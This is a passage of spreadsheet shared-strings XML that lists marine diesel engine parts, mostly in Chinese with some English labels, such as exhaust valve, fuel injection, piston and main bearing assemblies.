      </rPr>
      <t>AIR CYLINDER</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>EXHAUST VALVE ASSEMBLY (1)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动油泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀导向套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀阀杆阀座研磨机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀止动板</t>
    </r>
  </si>
  <si>
    <r>
      <t>EXHAUST VALVE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VALVE HOUGING 1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3</t>
    </r>
  </si>
  <si>
    <r>
      <t>EXHAUST VALVE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VALVE SEAT</t>
    </r>
  </si>
  <si>
    <r>
      <t>EXHAUST VALVE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VALVE STEM</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装快</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平头螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮控开关</t>
    </r>
  </si>
  <si>
    <r>
      <t>FO CONTROL LINKAGE COMPLATE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油调整总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油齿条指示转换器总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射泄放支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油缓冲器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵驱动装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮销钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滑油管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油滤器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸器底垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油侧走台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中段走台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中段走台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中段走台装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台之间装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端罩壳装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油分配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷油管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷油支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油回油主管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力调节阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油切断阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器定距块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放主管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器定位销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧座圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞测试表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压盖填料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油脂嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接杆组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无头旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽六角螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚螺栓装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绞制底脚螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气控制阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套水进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承进管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞内件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆内管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检修盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主吸入阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊支撑板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位杆组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位开关保护盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承进口主管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承滑油支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承滑油装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作空气线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作空气管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用考克</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校对量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环槽测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械密封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴固定器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档油板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油环组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动油出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套水出口连接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
